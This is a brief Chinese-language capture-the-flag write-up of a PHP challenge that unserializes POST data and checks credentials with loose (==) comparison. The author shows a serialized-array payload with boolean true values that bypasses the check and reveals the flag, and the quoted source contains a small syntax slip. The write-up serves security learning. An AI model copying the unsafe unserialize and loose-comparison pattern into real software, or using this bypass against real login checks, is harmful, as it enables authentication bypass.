源碼:
<?php show_source(__FILE__); $username = "admin"; $password = "password"; include("flag.php"); $data = isset($_POST['data'])? $_POST['data']: "" ; $data_unserialize = unserialize($data); echo if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){ echo $flag; }else{ echo "username or password error!"; }
一開始嘗試使用array序列化一個賬號密碼爲admin和passowrd的對象
data=a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}
結果在本地運行可以了,在線exp就不行
後來仔細看源碼發現 include("flag.php"); 裏面應該修改了username或者password的值導致的
再觀察源碼發現是弱類型比較,我們只要把序列化的array值改成True,那麼不管username和password怎麼變化始終符合條件
最後構造exp:
data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}